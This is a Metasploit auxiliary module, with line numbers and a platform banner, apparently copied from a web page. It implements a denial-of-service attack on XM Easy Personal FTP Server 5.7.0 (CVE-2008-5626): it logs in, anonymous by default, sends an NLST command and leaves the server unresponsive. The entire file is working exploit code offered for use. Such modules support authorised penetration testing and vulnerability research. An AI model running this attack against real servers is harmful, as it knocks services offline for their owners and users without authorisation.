Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Ftp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'XM Easy Personal FTP Server 5.7.0 NLST DoS',
13
      'Description'    => %q{
14
        You need a valid login to DoS this FTP server, but
15
        even anonymous can do it as long as it has permission
16
        to call NLST.
17
      },
18
      'Author'         => 'kris katterjohn',
19
      'License'        => MSF_LICENSE,
20
      'References'     => [
21
        [ 'CVE', '2008-5626'],
22
        [ 'OSVDB', '50837'],
23
        [ 'EDB', '8294' ]
24
      ],
25
      'DisclosureDate' => '2009-03-27')
26
    )
27

28
    # They're required
29
    register_options([
30
      OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ], fallbacks: ['USERNAME']),
31
      OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ], fallbacks: ['PASSWORD'])
32
    ])
33
  end
34

35
  def run
36
    return unless connect_login
37

38
    raw_send("NLST\r\n")
39

40
    disconnect
41

42
    print_status("OK, server may still be technically listening, but it won't respond")
43
  end
44
end
45

46